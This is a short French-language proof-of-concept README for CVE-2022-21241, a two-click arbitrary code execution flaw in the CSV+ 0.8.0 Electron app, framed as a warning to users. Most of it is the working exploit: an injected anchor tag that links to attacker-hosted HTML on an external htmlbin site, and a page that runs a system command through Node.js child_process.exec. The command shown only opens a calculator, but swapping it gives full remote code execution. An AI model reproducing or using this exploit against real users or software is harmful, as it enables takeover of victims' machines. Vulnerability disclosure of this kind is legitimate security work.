
👻 [PoC] CSV+ 0.8.0 - Exécution de code arbitraire (CVE-2022-21241)
👻 Vulnérabilité d'exécution de code arbitraire en 2 clics.

CVE-2022-21241
⚠
Ce PoC a été créé pour alerter les utilisateurs et enquêter sur les vulnérabilités de leur propre CSV+, et son utilisation à des fins d'attaque est interdite.
Les versions suivantes sont vulnérables.
Les attaquants peuvent exécuter du code arbitraire en utilisant la fonctionnalité Node.js. Ils placent le code js malveillant sur un site et le lient à partir de balises a grâce à la vulnérabilité d'injection HTML dans CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html est un lien temporaire.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>